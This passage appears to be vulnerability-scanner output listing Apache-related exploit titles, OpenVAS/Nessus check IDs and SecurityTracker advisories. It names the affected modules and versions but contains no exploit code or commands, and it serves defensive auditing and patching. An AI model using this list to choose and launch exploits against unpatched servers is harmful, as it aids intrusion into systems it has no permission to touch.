| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
| [466] htpasswd Apache 1.3.31 - Local Exploit
| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
| [9] Apache HTTP Server 2.x Memory Leak Exploit
|
7875| OpenVAS (Nessus) - http://www.openvas.org:
7876| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
7877| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
7878| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
7879| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
7880| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
7881| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
7882| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
7883| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
7884| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
7885| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
7886| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
7887| [900571] Apache APR-Utils Version Detection
7888| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
7889| [900496] Apache Tiles Multiple XSS Vulnerability
7890| [900493] Apache Tiles Version Detection
7891| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
7892| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
7893| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
7894| [870175] RedHat Update for apache RHSA-2008:0004-01
7895| [864591] Fedora Update for apache-poi FEDORA-2012-10835
7896| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
7897| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
7898| [864250] Fedora Update for apache-poi FEDORA-2012-7683
7899| [864249] Fedora Update for apache-poi FEDORA-2012-7686
7900| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
7901| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
7902| [855821] Solaris Update for Apache 1.3 122912-19
7903| [855812] Solaris Update for Apache 1.3 122911-19
7904| [855737] Solaris Update for Apache 1.3 122911-17
7905| [855731] Solaris Update for Apache 1.3 122912-17
7906| [855695] Solaris Update for Apache 1.3 122911-16
7907| [855645] Solaris Update for Apache 1.3 122912-16
7908| [855587] Solaris Update for kernel update and Apache 108529-29
7909| [855566] Solaris Update for Apache 116973-07
7910| [855531] Solaris Update for Apache 116974-07
7911| [855524] Solaris Update for Apache 2 120544-14
7912| [855494] Solaris Update for Apache 1.3 122911-15
7913| [855478] Solaris Update for Apache Security 114145-11
7914| [855472] Solaris Update for Apache Security 113146-12
7915| [855179] Solaris Update for Apache 1.3 122912-15
7916| [855147] Solaris Update for kernel update and Apache 108528-29
7917| [855077] Solaris Update for Apache 2 120543-14
7918| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
7919| [850088] SuSE Update for apache2 SUSE-SA:2007:061
7920| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
7921| [841209] Ubuntu Update for apache2 USN-1627-1
7922| [840900] Ubuntu Update for apache2 USN-1368-1
7923| [840798] Ubuntu Update for apache2 USN-1259-1
7924| [840734] Ubuntu Update for apache2 USN-1199-1
7925| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
7926| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
7927| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
7928| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
7929| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
7930| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
7931| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
7932| [835253] HP-UX Update for Apache Web Server HPSBUX02645
7933| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
7934| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
7935| [835236] HP-UX Update for Apache with PHP HPSBUX02543
7936| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
7937| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
7938| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
7939| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
7940| [835188] HP-UX Update for Apache HPSBUX02308
7941| [835181] HP-UX Update for Apache With PHP HPSBUX02332
7942| [835180] HP-UX Update for Apache with PHP HPSBUX02342
7943| [835172] HP-UX Update for Apache HPSBUX02365
7944| [835168] HP-UX Update for Apache HPSBUX02313
7945| [835148] HP-UX Update for Apache HPSBUX01064
7946| [835139] HP-UX Update for Apache with PHP HPSBUX01090
7947| [835131] HP-UX Update for Apache HPSBUX00256
7948| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
7949| [835104] HP-UX Update for Apache HPSBUX00224
7950| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
7951| [835101] HP-UX Update for Apache HPSBUX01232
7952| [835080] HP-UX Update for Apache HPSBUX02273
7953| [835078] HP-UX Update for ApacheStrong HPSBUX00255
7954| [835044] HP-UX Update for Apache HPSBUX01019
7955| [835040] HP-UX Update for Apache PHP HPSBUX00207
7956| [835025] HP-UX Update for Apache HPSBUX00197
7957| [835023] HP-UX Update for Apache HPSBUX01022
7958| [835022] HP-UX Update for Apache HPSBUX02292
7959| [835005] HP-UX Update for Apache HPSBUX02262
| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [801942] Apache Archiva Multiple Vulnerabilities
| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
| [801284] Apache Derby Information Disclosure Vulnerability
| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
| [800680] Apache APR Version Detection
| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
| [800677] Apache Roller Version Detection
| [800279] Apache mod_jk Module Version Detection
| [800278] Apache Struts Cross Site Scripting Vulnerability
| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
| [800276] Apache Struts Version Detection
| [800271] Apache Struts Directory Traversal Vulnerability
| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
| [103122] Apache Web Server ETag Header Information Disclosure Weakness
| [103074] Apache Continuum Cross Site Scripting Vulnerability
| [103073] Apache Continuum Detection
| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
| [101023] Apache Open For Business Weak Password security check
| [101020] Apache Open For Business HTML injection vulnerability
| [101019] Apache Open For Business service detection
| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
| [100923] Apache Archiva Detection
| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
| [100813] Apache Axis2 Detection
| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
| [100795] Apache Derby Detection
| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
| [100514] Apache Multiple Security Vulnerabilities
| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [72626] Debian Security Advisory DSA 2579-1 (apache2)
| [72612] FreeBSD Ports: apache22
| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
| [71512] FreeBSD Ports: apache
| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
| [71256] Debian Security Advisory DSA 2452-1 (apache2)
| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
| [70737] FreeBSD Ports: apache
| [70724] Debian Security Advisory DSA 2405-1 (apache2)
| [70600] FreeBSD Ports: apache
| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
| [70235] Debian Security Advisory DSA 2298-2 (apache2)
| [70233] Debian Security Advisory DSA 2298-1 (apache2)
| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
| [69338] Debian Security Advisory DSA 2202-1 (apache2)
| [67868] FreeBSD Ports: apache
| [66816] FreeBSD Ports: apache
| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
| [66081] SLES11: Security update for Apache 2
| [66074] SLES10: Security update for Apache 2
| [66070] SLES9: Security update for Apache 2
| [65998] SLES10: Security update for apache2-mod_python
| [65893] SLES10: Security update for Apache 2
| [65888] SLES10: Security update for Apache 2
| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
| [65510] SLES9: Security update for Apache 2
| [65472] SLES9: Security update for Apache
| [65467] SLES9: Security update for Apache
| [65450] SLES9: Security update for apache2
| [65390] SLES9: Security update for Apache2
| [65363] SLES9: Security update for Apache2
| [65309] SLES9: Security update for Apache and mod_ssl
| [65296] SLES9: Security update for webdav apache module
| [65283] SLES9: Security update for Apache2
| [65249] SLES9: Security update for Apache 2
| [65230] SLES9: Security update for Apache 2
| [65228] SLES9: Security update for Apache 2
| [65212] SLES9: Security update for apache2-mod_python
| [65209] SLES9: Security update for apache2-worker
| [65207] SLES9: Security update for Apache 2
| [65168] SLES9: Security update for apache2-mod_python
| [65142] SLES9: Security update for Apache2
| [65136] SLES9: Security update for Apache 2
| [65132] SLES9: Security update for apache
| [65131] SLES9: Security update for Apache 2 oes/CORE
| [65113] SLES9: Security update for apache2
| [65072] SLES9: Security update for apache and mod_ssl
| [65017] SLES9: Security update for Apache 2
| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
| [64783] FreeBSD Ports: apache
| [64774] Ubuntu USN-802-2 (apache2)
| [64653] Ubuntu USN-813-2 (apache2)
| [64559] Debian Security Advisory DSA 1834-2 (apache2)
| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
| [64443] Ubuntu USN-802-1 (apache2)
| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
| [64423] Debian Security Advisory DSA 1834-1 (apache2)
| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
| [64251] Debian Security Advisory DSA 1816-1 (apache2)
| [64201] Ubuntu USN-787-1 (apache2)
| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
| [63565] FreeBSD Ports: apache
| [63562] Ubuntu USN-731-1 (apache2)
| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
| [61185] FreeBSD Ports: apache
| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
| [60387] Slackware Advisory SSA:2008-045-02 apache
| [58826] FreeBSD Ports: apache-tomcat
| [58825] FreeBSD Ports: apache-tomcat
| [58804] FreeBSD Ports: apache
| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
| [57335] Debian Security Advisory DSA 1167-1 (apache)
| [57201] Debian Security Advisory DSA 1131-1 (apache)
| [57200] Debian Security Advisory DSA 1132-1 (apache2)
| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
| [57145] FreeBSD Ports: apache
| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
| [56067] FreeBSD Ports: apache
| [55803] Slackware Advisory SSA:2005-310-04 apache
| [55519] Debian Security Advisory DSA 839-1 (apachetop)
| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
| [55355] FreeBSD Ports: apache
| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
| [55261] Debian Security Advisory DSA 805-1 (apache2)
| [55259] Debian Security Advisory DSA 803-1 (apache)
| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
| [54439] FreeBSD Ports: apache
| [53931] Slackware Advisory SSA:2004-133-01 apache
| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
| [53878] Slackware Advisory SSA:2003-308-01 apache security update
| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
| [53848] Debian Security Advisory DSA 131-1 (apache)
| [53784] Debian Security Advisory DSA 021-1 (apache)
| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
| [53735] Debian Security Advisory DSA 187-1 (apache)
| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
| [53282] Debian Security Advisory DSA 594-1 (apache)
| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
| [53215] Debian Security Advisory DSA 525-1 (apache)
| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
| [52529] FreeBSD Ports: apache+ssl
| [52501] FreeBSD Ports: apache
| [52461] FreeBSD Ports: apache
| [52390] FreeBSD Ports: apache
| [52389] FreeBSD Ports: apache
| [52388] FreeBSD Ports: apache
| [52383] FreeBSD Ports: apache
| [52339] FreeBSD Ports: apache+mod_ssl
| [52331] FreeBSD Ports: apache
| [52329] FreeBSD Ports: ru-apache+mod_ssl
| [52314] FreeBSD Ports: apache
| [52310] FreeBSD Ports: apache
| [15588] Detect Apache HTTPS
| [15555] Apache mod_proxy content-length buffer overflow
| [15554] Apache mod_include priviledge escalation
| [14771] Apache <= 1.3.33 htpasswd local overflow
| [14177] Apache mod_access rule bypass
| [13644] Apache mod_rootme Backdoor
| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
| [12280] Apache Connection Blocking Denial of Service
| [12239] Apache Error Log Escape Sequence Injection
| [12123] Apache Tomcat source.jsp malformed request information disclosure
| [12085] Apache Tomcat servlet/JSP container default files
| [11438] Apache Tomcat Directory Listing and File disclosure
| [11204] Apache Tomcat Default Accounts
| [11092] Apache 2.0.39 Win32 directory traversal
| [11046] Apache Tomcat TroubleShooter Servlet Installed
| [11042] Apache Tomcat DOS Device Name XSS
| [11041] Apache Tomcat /servlet Cross Site Scripting
| [10938] Apache Remote Command Execution via .bat files
| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
| [10773] MacOS X Finder reveals contents of Apache Web files
| [10766] Apache UserDir Sensitive Information Disclosure
| [10756] MacOS X Finder reveals contents of Apache Web directories
| [10752] Apache Auth Module SQL Insertion Attack
| [10704] Apache Directory Listing
| [10678] Apache /server-info accessible
| [10677] Apache /server-status accessible
| [10440] Check for Apache Multiple / vulnerability
|
| SecurityTracker - https://www.securitytracker.com:
| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
| [1024096] Apache mod_proxy_http May Return Results for a Different Request
| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
